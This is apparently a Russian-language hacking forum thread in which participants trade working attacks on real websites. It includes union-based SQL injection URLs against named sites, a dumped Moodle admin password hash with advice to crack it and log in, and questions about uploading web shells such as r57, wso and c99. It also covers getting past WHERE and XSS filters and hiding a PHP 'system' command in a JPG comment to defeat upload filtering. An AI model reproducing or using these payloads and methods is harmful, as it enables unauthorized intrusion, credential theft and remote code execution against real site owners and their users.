2IVAN я же тебе писал не поленись перебери таблицы, если этот сайт для тебя важен, писал про таблицу mdl_user, вот что из туда выпало: http://1liceum.ru/shownew.php?setid=-1+union+SELECT+1,group_concat(0x3a,id,username,0x3a,password),3,4,5+from+u99526_moodle.mdl_user Code: ,:2admin:6c83c300238522d49d616550f45f9394,:3uraev:622694bd4f расшифруй и попробуй авторизоватся
просто он пишет что авторизоватся на сайте не может с теми даными что получил из таблицы lsh_infousers, я думаю стоит попробывать поискать записи юзверей в других таблицах, и как пример вытянул даные с таблицы mdl_user, где есть запись с login-admin, эту запись остается расшифровать и попробывать залогинится)))
http://www.interself.ru/info/newsshow.php?num=-273+union+select+1,column_name,3,4,5,6,7,8+from+information_schema.columns+where+table_name=0x7573657273--+ А как здесь вытащить столбцы ?
вариант №1 http://www.interself.ru/info/newsshow.php?num=-273+union+select+1,group_concat(column_name),3,4,5,6,7,8+from+information_schema.columns+where+table_name=0x75736572+limit+0,1--+ (где в хексе user) вариант №2 http://www.interself.ru/info/newsshow.php?num=-273+union+select+1,group_concat(column_name),3,4,5,6,7,8+from+information_schema.columns+where+table_name=0x62346d66715f7573657273+limit+0,1--+ (где в хексе b4mfq_users) p.s. таблички к которой ты составлял запрос походу нету (users), ну или я ее не нашол))
Ребят, из-за чего в MySQL скуле може НЕ РАБОТАТЬ where? Первый раз с таким сталкиваюсь. Любой запрос содержащий where не отрабатывает... Из-за чего может быть? Есть ли аналоги? Нужно сделать дамп примерно 2 000 000 записей. Лимит естественно ложит БД. p.s. фильтрации нету вроде ни на что. MySQL >=5
Кто-то сталкивался с такой штукой как Plogger Gallery? Нужно через нее залить шел. Вот ссылка на сайт галереи: http://www.plogger.org/
твостер писал про рутовый шелл, который все команды из под суидника запускает. там r57 был, линк устарел, есть wso или c99? upd: нашел
/*!+where+*/ и тому подобные обходы не работают... Да и кроме WHERE тогда НИЧЕГО не фильтруется? Смысл?
почитай тут может что получится, http://forum.antichat.ru/printthread.php?t=195037 ps 3 пункт "Альтернатива where"
Такой вопрос... если у меня есть пассивка, которая находится между тегов <script> </script> то выполнится ли код в браузерах с фильтром xss(chrome, ie8+)? протестить пока не могу
Вопрос такой: есть возможность заливать картинки на сайт, но расширение и содержимое файла фильтруется, так вот помню читал где-то что при редактировании изображения можно дописать php код в какие-то теги. Не напомните что за способ? Или поделитесь другими методами обхода такой фильтрации
В фотографиях с расширением jpg есть комментарии. Так вот в качестве комментария можно дописать <?php system($cmd) ?> без вреда картинке(т.е. она потом будет открываться и работатькак картинка). Делается это с помощью программы edjpgcom.exe или другой для просмотра/редактирования комментариев в jpg файлах.
